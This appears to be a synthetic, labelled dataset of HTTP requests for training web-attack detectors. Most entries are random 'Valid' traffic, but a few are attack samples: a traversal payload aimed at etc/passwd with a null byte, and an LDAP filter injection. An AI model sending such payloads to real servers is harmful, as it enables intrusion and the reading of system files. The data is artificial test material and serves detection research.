UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 508x349
Via: gemKe/2.6 97.164.108.201, 6.9 www.tcattc.js
Transfer-Encoding: dedro
Upgrade: nh8h/9.9, eweeTf/0.2
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48930
Start - Id: 2065
class: Valid
GET /odi1oHoDAaae7hea/ojq.html? HTTP/1.1
Host: 129.25.137.222
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 160.70.47.198
Cookie: QBaZlink=1457805908;mow=Fo;prsnohSasl=usr706irihrlsor;uo7ee5eiA=lehsaibnre;;ePArasdUfLhmcs=nphp;fnipoi01ioMueie=gFoIQBKz
Cookie2: $Version="2"
Date: Sun, 18 Jan 04 18:12:12 GMT
ETag: "CqKJhzj3js0ETbABe"
Expect: lprt=6hOebism;raxsl
From: wDshh4eU@hl5stetee.com
If-Modified-Since: Fri, 09 Dec 05 16:49:37 CET
If-Unmodified-Since: Sat, 10 Jul 04 19:07:34 UTC
If-Match: "eLOhbSt9teIsT7m@BcL"
If-None-Match: *
If-Range: Fri, 30 Apr 04 11:12:52 UTC
Max-Forwards: 34
MIME-Version: 1.2
Pragma: tmrcncsw=eUo0
Proxy-Authorization: sgUhr eKit=0iDeacaT
Authorization: hipejj svrag=efreaAt
Range: -586766,7072-,732551-
Referer: http://rEtb.de/ysGban.asp
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.6 (Machintosh; U; Mac OS X 1.9; A4-hr; rv:3.2.6) Gecko/80568159
UA-CPU: StrongARM
UA-Disp: 0185,510,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 008x3318
Via: 0.5 www.bmrav8e.html, 2.4 57.15.211.108:257, 9.6 www.nnnaknhS.jpeg
Transfer-Encoding: compress
Upgrade: wleh/1.8
Warning: 344 www.BJasytN.css "r0la5" 
X-Forwarded-For: 242.10.119.24
X-Serial-Number: 82872435333808
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 2065
Start - Id: 9788
class: Valid
GET /t-QOH9Mn04/huKCQts9/0P1QM76catlFhtacces/k6TthoaoNhit/e14i2Akno-02QEZ/dQn7c/49q1Ocsystem2R/e9oR2UuV5r1Y0KQJB/tLMRz/aVPaDsbdocument@/Coi/phpTNS.png?DBv_scriptIFVUNI=iitym3&pdcIucndadahecp=mua7ehnedoatmi2u&N7tenl=2uaahstoorhTe&@e4-xp_N-=ilib&7shuqwaetA5els=optjEotatdzekp8%3E HTTP/1.0
Host: 68.159.225.107:80
Connection: close
Accept: application/*;q=0.5, text/*
Accept-Charset: shift_jis;q=0.0
Accept-Encoding: compress;q=0.3, gzip;q=0.2, identity;q=0.0
Accept-Language: e-Hanwtemr, saai-rgur;q=0.4, rrm1-0nwizkx
Cache-Control: no-store
Client-ip: 161.105.192.68
Cookie: tna5l=5709607;eeeccr3jriht=4lp  ;tle:xl letsewp-m;a2l81o78c20bilg=lea;7Dn7fk17S2=5643
Cookie2: $Version="74"
Date: Sun, 31 May 09 06:00:04 GMT
ETag: W/"@QgOOO7BxNMt3_qFD"
Expect: 0oNeitt
From: e7mzm@im8r.uk
If-Modified-Since: Sun, 26 Feb 06 15:18:57 UTC
If-Unmodified-Since: Sun, 03 Jun 07 05:46:52 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 May 04 09:08:42 CET
Max-Forwards: 0
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: IsiUr 6twklat=tyei
Authorization: Ttrts tNc3tO=idhOt
Range: 32-
Referer: /evOcYn/icjh.pl
TE: gzip,deflate;q=0.0,deflate;q=0.6
Trailer: Trailer
User-Agent: kytTubb
UA-CPU: PowerPC
UA-Disp: 152,310,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 493x9189
Via: 2.5 www.4rhns.js, HTTP/5.6 www.3eao.jpg, 8.3 www.mxbja.html
Transfer-Encoding: identity
Upgrade: cds2Qc/0.8, daru/8.7, roew/2.1, hnm/9.5, saile/8.5
Warning: 073 www.nechC.html "cxeieM" 
X-Forwarded-For: 215.67.208.226
X-Serial-Number: 3012101828224515543
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9788
Start - Id: 38834
class: LdapInjection
GET /0ssd6endlzittaneo/cseTl86xW3f1ectapei/vsouose.asp?ewsykehn=E&Ydeals9cvx=oWxT&Jf0t2apdito=41103&ZQh8FyOcexecIa=%7Erltiframe%3BvbscriptILl1oi2aD&ntcvno4=sdocumentff-&19taeeroblv=xTKxGH3x8Kn&as1wVa=xml0z8MmCe&art9o8salo=%29+%28++++%7C+++%28oKj%3DnoTu*%29&bzmsu=70787&rWrsm3d=dPYjkcM&@UlibjEfinsertboot.ini6Uz=768377&alTs=t1Idz7&nueea=1964731060 HTTP/1.0
Host: 229.229.99.89
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-icelandic, iso-8859-7;q=0.8
Accept-Encoding: *
Accept-Language: elzfn-epd, rnntetia-c1D, 0sirta-tci;q=0.7
Cache-Control: qe=wcx2
Client-ip: 244.46.205.26
Cookie: 7thepd9iilaevv3=hsTr;aiceneedfahh=3830941;nr=de4euEut0is
Cookie2: $Version="62"
Date: Wed, 07 Apr 04 01:16:47 CET
ETag: W/"h6MB8nr3He6wdxV5k"
Expect: 100-continue
From: oeee@geqtla3o.org
If-Modified-Since: Fri, 27 Oct 06 22:20:13 GMT
If-Unmodified-Since: Thu, 19 Apr 07 13:42:17 CET
If-Match: "w_H6AkW9grgxgMz3ZFz_"
If-None-Match: "tOlK3yRJJN9QpqiLdp6"
If-Range: "cMRmx-stb29QkvqcJj"
Max-Forwards: 6
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic ZXh1YU9vOkJyYXVmSTQ=
Authorization: NTLM MW1rcmkxZjZ6dm5zbnJlOW4zMWlhbmVka2F0ZTJsOHQ4aXRycnM3aWVmb3cyb0t0
Range: 088-865,-53,38290-
Referer: /ngc6q2/nOeadr.php3
TE: deflate,chunked;q=0.1
Trailer: User-Agent
User-Agent: tcSwm (lAetuSUDLf; etC2ljKm; brpB1j47; yJ2aHAYS1n)
UA-CPU: MIPS
UA-Disp: 3032,6825,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 072x4241
Via: FTP/0.4 www.fiitn.png
Transfer-Encoding: gzip
Upgrade: 5e2/8.1, neual/2.6, shex0/3.0, srtfSe/9.7
Warning: 025 www.snltrm.tiff "tuatoroypwbr" 
X-Forwarded-For: 19.112.51.121
X-Serial-Number: 465738
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38834
Start - Id: 5805
class: Valid
POST /vi_dfOl/ov/gm2f8GD4x/4TsIV/N7TjYmO55OUVuX/brYrt/ala3hirsrmpnc/muRCUC/atkB54pdiH/Wmsht1/ldr5tnbNe9uo/ufex_nwh7aXMZ.png? HTTP/1.0
Content-Length: 97
Content-Language: f,teadte,5bp
Content-Encoding: identity
Content-Location: http://uI009.it/ptntsa/eoeh/Maokfcd.asp
Content-MD5: YW5obmRoYTJldHRkam9xcQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Apr 07 08:12:31 GMT
Last-Modified: Thu, 29 Dec 05 20:09:58 GMT
Host: 215.187.199.207:80
Connection: ehoertr
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesesimp, windows-1257
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: min-fresh=2517
Client-ip: 42.172.144.34
Cookie: J.Ff53S7Sro=lka ;iabioel2eQo3brg=/T8tstnteo;oTlnilc9=4;95ltiiuhpEneeO=49431963;bfexecg5Fyv-B=uQyhwe6_EGna;qe1vtaeof=rhOB
Cookie2: $Version="558"
Date: Sat, 07 Jul 07 12:32:05 CET
ETag: W/"kdXGVOPA-hkDlC8TP"
Expect: nel1=yoolom
From: s8eohuh@Trune.de
If-Modified-Since: Sun, 04 Jan 04 05:01:28 UTC
If-Unmodified-Since: Tue, 02 Dec 08 14:51:43 GMT
If-Match: "_4mr6jC06rcjT7kSD"
If-None-Match: "X0skp2DqxUWIK8Mn"
If-Range: Wed, 11 Oct 06 24:53:37 GMT
Max-Forwards: 1813
MIME-Version: 2.7
Pragma: timcpeex='dttheKt'
Proxy-Authorization: Basic dXBuY3VkOmhzMW9v
Authorization: NTLM ZXMwb2V0dG9mZHNlbG5uYXRnYWFhdXNlbWVhdW9sc2Vhbg==
Range: 741779-46
Referer: http://www.apt6MCe.it/xsga7e.exe
TE: deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.8 (X11; U; Open BSD i386 4.0; gs-dk; rv:0.7.8) Gecko/37600289
UA-CPU: MIPS
UA-Disp: 746,8790,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1021x7299
Via: 9.8 www.pllNah.jpeg, HTTP/3.5 www.cnelme.gif, HTTP/9.3 www.RPrTLs.png
Transfer-Encoding: deflate
Upgrade: raEat/5.3, am6cih/1.5
Warning: 057 www.Erpswu.tiff:80 "ws9y7tenxlrelypsyt" "Sun, 03 Sep 06 19:18:45 UTC"
X-Forwarded-For: 128.88.36.141
X-Serial-Number: 8692230651
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

cstntah=tftee5s8tboeoe1&850dwanh0se=calsenehpuwindow.open&yncKq-objectx.6Md=929651&scygfRa=eRRF68

End - Id: 5805
Start - Id: 4092
class: Valid
PUT /uG/nce38qJ.O/homeh3tcmdAsock_stream.asmx? HTTP/1.0
Content-Length: 119
Content-Language: asl6lp,ep,xnt
Content-Encoding: gzip
Content-Location: http://www.stnc.net/notigM/naeitron/mlese.asp
Content-MD5: U3NhZzI1dHNXaWUxaWljaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 14 Mar 08 24:36:48 UTC
Last-Modified: Wed, 16 Dec 09 17:50:51 UTC
Host: www.ttst9.org
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7-5q;q=0.5, rea-Se
Cache-Control: nvtmll=9qwl8Ae
Client-ip: 91.6.188.179
Cookie: Ooc3t=hf
Cookie2: $Version="8"
Date: Mon, 22 Nov 04 12:35:56 UTC
ETag: W/"aAN@Uuk_pWwOFQznW6v"
Expect: 100-continue
From: lAink@earlw.gov
If-Modified-Since: Sun, 11 Jan 04 24:45:16 GMT
If-Unmodified-Since: Mon, 04 Dec 06 15:14:39 CET
If-Match: "fUomY_D7bv7-ReiXXY"
If-None-Match: "yXcFQv0-fuXMM3bCYhL"
If-Range: Tue, 08 Jul 08 02:35:56 CET
Max-Forwards: 700
MIME-Version: 8.5
Pragma: lsfj='li'
Proxy-Authorization: Basic clVpaGFTOlR0UnBydA==
Authorization: Digest realm
Range: 92-96456,-88312
Referer: http://www.lZllk.cz/inegSei2/otsfsbmj/1wpe/orony.asp
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: u9oefsoz/1.7
UA-CPU: MIPS
UA-Disp: 4996,3715,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1301x1133
Via: e4h6/4.1 www.Pahson.htm, hst/0.0 www.sqeei.jpg
Transfer-Encoding: identity
Upgrade: eh1/2.8, iari/5.8
Warning: 154 253.72.13.96 "odslseae3oO1ilHaa" "Thu, 11 Jun 09 01:26:19 GMT"
X-Forwarded-For: 68.146.106.65
X-Serial-Number: 8957401
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~

ttdSeu=Dm&hmeggr=ceitwrncoNdasj&nmryRaechay=322042&-xmlEZSkuiQ=zeet 1replaces&k_ycZ4hHso=02400920&ee8leek6ln2oc=1712464

End - Id: 4092
Start - Id: 32235
class: Valid
GET /nW5NYS-w5wKy/dAF5uNC/mGXfKroVB/8krohoDsedvejbooSr/PvbscriptHo.anu/I3htfshsto7uI1ejena/p0Ed/xmeBeN/qxq@3WX4KII_/W6tZYL6nph-vn/hHB4vrPIocGH.bwGV.asmx?w3sin=skeo7ziyt2&ieo=wsnnjrautdga%3Bnode&UVYM_X6UQ9=shoR3Lwfmot&SNo5h=e.KB0WRVtmj%40&b6tfpidure8mfen=vvtexeci&sni3atbsrx=35625&2dARF.TLexeceV=gIethd&oenir4EhsWhS=fytootenkles&lt=31951260&Dp=30&aownil3eh=lee6tpkngaien1e&bsd=efhmhweioe&mexahothhgo2fl=stU&Wcl=4003&oielai=%5Bw6 HTTP/1.0
Host: 93.154.60.88
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 107.172.234.29
Cookie: aonolujEiwee=9iRhttpitfeo;Aellnetlo=017843;zbNoonEr31nao=iotdpsarnJtad;IrioieI7dxah=gw7hs
Cookie2: $Version="257"
Date: Fri, 18 Apr 08 18:15:51 UTC
ETag: "52QtU01ChCXqCgIMc3n"
Expect: liiw=oSls
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Sat, 06 Mar 04 24:59:25 GMT
If-Unmodified-Since: Thu, 31 Aug 06 13:51:21 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Oct 08 01:05:12 CET
Max-Forwards: 502
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="udr5p1ia"
Authorization: Digest cnonce="etpsrz"
Range: -594,-1001,-2
Referer: /aettlpEy/te2re.rar
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: faSp1usewdyGapot5blX
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 800x1490
Via: FTP/6.6 74.81.3.210, FTP/5.6 159.131.5.152
Transfer-Encoding: identity
Upgrade: atnr9/2.7, 0rq/7.6
Warning: 336 182.21.42.184:1 "eedHahvhhraslhmrAtow" "Thu, 26 Aug 04 11:09:03 CET"
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 32235
Start - Id: 18874
class: Valid
GET /tiefj/fYZOMQreplacehtpass8UV9O.gif?fxAyA=3&bt=6403397908&taiC=la%5Cl2-ossrrueoko%3EH&irol=rhusnrhsmesliiUhtW HTTP/1.0
Host: www.eesn9c.com
Connection: close
Accept: audio/basic;q=0.2
Accept-Charset: iso-2022-jp;q=0.8, windows-1251;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 100.195.49.71
Cookie: fpt8im2EhHykea1=u;hrfie=33186
Cookie2: $Version="71"
Date: Fri, 18 Jun 04 12:56:12 GMT
ETag: W/"a@_3HZVnaC6FUe4D"
Expect: luol2gma
From: jontegt@8eoi1ys.fr
If-Modified-Since: Wed, 05 Apr 06 09:00:00 GMT
If-Unmodified-Since: Sat, 10 Jul 04 14:31:19 CET
If-Match: "OG3@jJWzlzBNd67u"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.1
Pragma: Egt='kcfar'
Proxy-Authorization: NTLM b2hkbGxzN2lvUmNmQWFsM2VvYXdMbnJmQWltYWV0aGw=
Authorization: NTLM ZWVhbG9oOGxoaWVoYVRucnJ0aFN1NmFkN3dlbWVrbDltdFlnbmVhN2k=
Range: 401413-5174
Referer: http://taBrtIn.ch/maro/7a0b0sf3/dsaic.tiff
TE: chunked;q=0.6,trailers
Trailer: Host
User-Agent: e1tg/3.2.8.3.4
UA-CPU: StrongARM
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4447x587
Via: scs/0.4 155.247.204.218
Transfer-Encoding: deflate
Upgrade: ekNth/2.5, rgs/1.1, ob2/8.6, v8twea/4.7, 0smean/7.4
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 40451880140353665306
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18874
Start - Id: 15723
class: Valid
GET /hzwC.@wZQv6RFxoYp6/where7Eecho-BmcoIZJC/theUvit/aZ3X6.Nh3.cgi?CCUxr=aUcexhe&eehao0=4&GDaPF4o=aIrMxVJcYC&nNeeEfitltl=12429&nit5ehcpTef=5e3psi&p2hey=9%3Ea&Tgg=nROO&xeeridrasda=5ew+utne&e85tcrenTeresar=n%5Did HTTP/1.0
Host: 217.69.206.40:484
Connection: close
Accept: video/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-age=37277
Client-ip: 140.143.199.118
Cookie: dteqgIotv=uddnsHoi;hsiin2cNtoef=83
Cookie2: $Version="3"
Date: Sun, 28 Oct 07 06:07:09 UTC
ETag: W/"qg@i5ORV1-pGeZk8L"
Expect: 6eatinnv
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Sun, 11 Apr 10 04:47:15 CET
If-Unmodified-Since: Wed, 14 Nov 07 06:42:27 UTC
If-Match: "DyqQorswHk_b-kI9Lo4"
If-None-Match: "Ao9GR.CJPsK3NK-Vs"
If-Range: Sun, 07 Dec 08 23:35:05 CET
Max-Forwards: 611
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM ZWVvYnNqdDdpakllaDhodHN5ZWVZZUV2cnJlY3RvZWVlVHR0dHlkOGhmdGU=
Authorization: l3hs SiosEBl=eedchr
Range: 2-,-372
Referer: /thtLid/waaiomen/Sei6n/Oisl/ssxn6ii.sh
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/5.2 (X11; U; SunOS sun4u 4.4; Ho-7a; rv:9.5.9) Gecko/97692345
UA-CPU: MIPS
UA-Disp: 6952,635,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 638x329
Via: FTP/0.3 www.n7hlih.tiff, FTP/1.6 www.1bsg2ucW.jpeg, gxy7ol/5.3 www.Oso4.png
Transfer-Encoding: gzip
Upgrade: qrejo/1.3
Warning: 005 135.73.33.138 "yr2lt" 
X-Forwarded-For: 42.186.95.123
X-Serial-Number: 555023929683
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15723
Start - Id: 869
class: Valid
GET /rdDmsho8/pzeserdoittr/pFqMPM.mdb?tcisowsaeerth=+63b HTTP/1.0
Host: 25.156.99.62
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 72.248.175.184
Cookie: oFeeki91gdt=oz;rtr=cub2
Cookie2: $Version="84"
Date: Tue, 22 Jun 04 09:31:37 GMT
ETag: "z.JVt4yr9ZxbvMY_0PAC"
Expect: 100-continue
From: eboyso@usT0nl.gov
If-Modified-Since: Wed, 09 Jul 08 18:45:58 UTC
If-Unmodified-Since: Fri, 06 Mar 09 03:45:08 CET
If-Match: *
If-None-Match: "xn@ka0dVyqPJBOR@dG"
If-Range: *
Max-Forwards: 12
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZWVvbnRhT2VPYXV0ckVuZWlqZW5pZGVhbkl6aW9pZG50Nw==
Range: 95471-
Referer: http://www.elsaohev.net/hlwehu/tlg1M/sco0dsE/eexieh/sea0i2.css
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: euHV5TM http://www.bsn8epy.st
UA-CPU: x86
UA-Disp: 1675,0086,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 130x106
Via: aIzofj/4.4 www.HNeti.tiff, 8.3 www.8Ozmhtl.css
Transfer-Encoding: bopv; hjuwi6H=7tosel
Upgrade: 7hee/2.9
Warning: 365 118.102.144.238 "T2htwaueRex7" 
X-Forwarded-For: 44.170.70.161
X-Serial-Number: 510626783025324042
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 869
Start - Id: 31711
class: Valid
GET /nmihmceme6/n6a35r-dCoUvPq/Qform/sz27aVgyrtIb1/ngwi/roH8cmi5s5k/aUslrnnocdob3l/nfX5oBbR0.jpeg?eCnoGQxtte=53500 HTTP/1.1
Host: 148.75.81.226:443
Connection: movw3iur
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tizesepw-rE;q=0.1, LI-esa1y, xct-ee7;q=0.6, otweheO-7obmoh
Cache-Control: yalriL=a
Client-ip: 126.59.240.139
Cookie: cAtlq=qosut
Cookie2: $Version="85"
Date: Mon, 25 Jun 07 21:46:28 CET
ETag: W/"ntY0UxPFq.tHV0D2qQoh"
Expect: 100-continue
From: rKtsre@uhAOD.com
If-Modified-Since: Sat, 18 Nov 06 01:06:19 CET
If-Unmodified-Since: Thu, 18 May 06 17:09:45 CET
If-Match: "X8@f3M5Lo4daS0GekMd"
If-None-Match: *
If-Range: Tue, 07 Feb 06 04:35:48 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: w1z=cu
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM U25paWwzQWw0aXdoTklvem5pQWZhbjZzcml4emVuZWNyYWEzaGVoaGFyaW4=
Range: 8-
Referer: /tv0sr7a/rioyrt5/nhdn.msf
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: Mozilla/6.8 (Windows; U; Win98 0.5; yn-fj; rv:1.1.6) Gecko/70874812
UA-CPU: PowerPC
UA-Disp: 574,324,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9430x7643
Via: 9.7 www.atrH2.jpg
Transfer-Encoding: compress
Upgrade: iown/4.2, Tniaa/7.9
Warning: 582 63.98.99.8 "lare9ilntstaLhew" "Tue, 29 Nov 05 02:58:50 UTC"
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 48619214669
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31711
Start - Id: 46150
class: PathTransversal
GET /a0-ltQQM.f.IZBbhHvNk/1pnvrseeen.asp?nnauoctmawimor=md&intodietaN8a=andEt&h7nrsniolrmi=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&ene6dismthm=tconnect%7Csa&rt8huwsgnla0=iqhegbi&xoReta=63909590&E_P_from=%3C80%25iframe&ztJe3=i2NeEnAtxtermfencGd%24zs%7Ct&UVu3mje6n2=m4%29b+oey3oiec&sfzcaa1neIpt=nzinos+r&0Bt1d6aa=tac_2AoC_ HTTP/1.1
Host: 194.119.55.149
Connection: keep-alive
Accept: text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-stale=4
Client-ip: 172.17.95.67
Cookie: fWJEhfR86qE=18505;ei8oes=97195343;8oso63=327394;AtnFhaazu0a=p;etuNyfntsEeu=7UihN_WIjC
Cookie2: $Version="52"
Date: Wed, 17 Nov 04 24:56:11 GMT
ETag: W/"Cpkj5v2oEph2JVYk"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sun, 01 Jan 06 01:10:49 CET
If-Unmodified-Since: Sat, 20 Feb 10 02:46:20 GMT
If-Match: "EG0f8PeFHceGknMrW90i"
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 0092
MIME-Version: 8.6
Pragma: abs2kim='es6bw'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest username="ogaE"
Range: 930922-
Referer: /7aoieRlj/ly5ief.jpg
TE: deflate,deflate;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.5 (compatible; dytlsoonse; Open BSD i586; iaT8ea)
UA-CPU: x86
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Pixels: 9278x723
Via: 6.0 www.nslvg.png, HTTP/8.7 236.214.149.224, hrel/6.1 www.aoEJee.png
Transfer-Encoding: thho
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Serial-Number: 678023085
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46150
Start - Id: 346
class: Valid
GET /pSitaemce1/ecl2GiemcPcvjhcpm/hteEdaaercy8/t36O7Hdke66.V/iWNOQkVrXnBnQrkPPrKg/ebp2lbmt/g1F.QBa93l/ynt/mWV_puG-Oj81cm9/oxZ2H5/xtvrnnRqshRrte1w/htq.php?dhgepd=6747&nxoocfrra5op=2774860&e3scbrerlewr=t%3AecieIexecopA8mochas&moanat5inmineEa=speo&orptizh=sczyabys0gd1biadjn&wWNxEDwXGs=61&Lwjctue=inXrnoLu&o1hlU6sNhd=05204&etv=pwe3nni7latrkrldn&asrowHUcmESdrt=7083094 HTTP/1.1
Host: 126.85.218.67
Connection: close
Accept: application/x-tar, text/html
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 192.168.223.13
Cookie: aueluIrssi51d=zr1q;oenh2aiI=argCnztreplacei lwiobit;sGi6nbocfneua0n=rDR3X9GX
Cookie2: $Version="08"
Date: Thu, 03 Nov 05 06:34:09 CET
ETag: "LPZN0wX54lCt.v_"
Expect: otaIh=soedh;s9zlcamt
From: yifn@s7icOeis.org
If-Modified-Since: Sun, 24 Dec 06 21:12:45 CET
If-Unmodified-Since: Tue, 11 Mar 08 22:44:54 UTC
If-Match: "DkBDTTDNE1RtYIwh3CR."
If-None-Match: *
If-Range: Tue, 02 Sep 08 12:01:37 UTC
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: ij0Eer rloelns=wlsh1o
Range: -174,-56
Referer: http://qortmm.fr/stjesyWh/btn1Niog/iAApas/jtig.tiff
TE: chunked;q=0.7
Trailer: Upgrade
User-Agent: Ohea (h5@HyV; q5MwqUq1J)
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 170x4525
Via: gnor7/8.3 119.163.159.16
Transfer-Encoding: gzip
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 856 133.9.23.161 "adbfddinDnmgns" "Wed, 17 Feb 10 19:40:50 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 21682850454988590168
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 346
Start - Id: 33416
class: Valid
PUT /@6wgbKEDdZlibVQchildr/o9nobriNsOdrtdkm/7Nlrk.qiU@C7Rjy/w5xkjg/zoL_@_XcrLX/s6smtdutfvn/t0t45sn.htm? HTTP/1.0
Content-Length: 233
Content-Language: i,n5yi5ns
Content-Encoding: compress
Content-Location: /tNlnb/eauc/eReqt2/oaie.html
Content-MD5: b3VsT2RlOWV4a0xpMFQ4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Nov 06 09:09:16 GMT
Last-Modified: Mon, 23 Feb 09 12:01:36 UTC
Host: 55.176.129.30
Connection: ricmia
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 176.30.127.43
Cookie: 95Z_lH.IcHp=925614;en=Odg?oAadud8di
Cookie2: $Version="2"
Date: Fri, 13 Aug 04 18:13:21 UTC
ETag: W/"60IDLh3ofRYVDqXC"
Expect: ityaa6uE=7efl
From: sDnariya@gF7oawo.it
If-Modified-Since: Tue, 15 Jun 04 24:10:53 CET
If-Unmodified-Since: Thu, 26 Feb 04 20:04:57 GMT
If-Match: "Bc@2LQ8AgmR@kKr0v"
If-None-Match: "fwhnwJC5a5tctPFdlhV"
If-Range: "7xmJkT_ikb9I2OlfErO"
Max-Forwards: 17
MIME-Version: 6.1
Pragma: i96l='tfloa'
Proxy-Authorization: Basic RzRoZHJpbjpncHNuNGllNQ==
Authorization: NTLM ZmFtYXZuNDBpZWhvOG84ZUVwZE00YXNzdTh3ZEVlZXdUb3Ryb2g=
Range: -45727
Referer: http://qatbm.cz/8Eguca.gz
TE: gzip
Trailer: If-Range
User-Agent: 9n5rmtl (iw3IOIj; ehL@Xh)
UA-CPU: StrongARM
UA-Disp: 326,087,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 669x659
Via: FTP/0.5 www.1i6utc.tiff, gea/3.0 www.etrtccdl.html, FTP/9.5 www.rnwa.css
Transfer-Encoding: deflate
Upgrade: o1eNnI/9.9, nAaet/1.1, unnto/0.9, tcEs/9.5
Warning: 647 164.77.60.132 "hnhznlfessi6tA" "Sun, 14 Feb 10 03:58:44 GMT"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 538088947583493833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

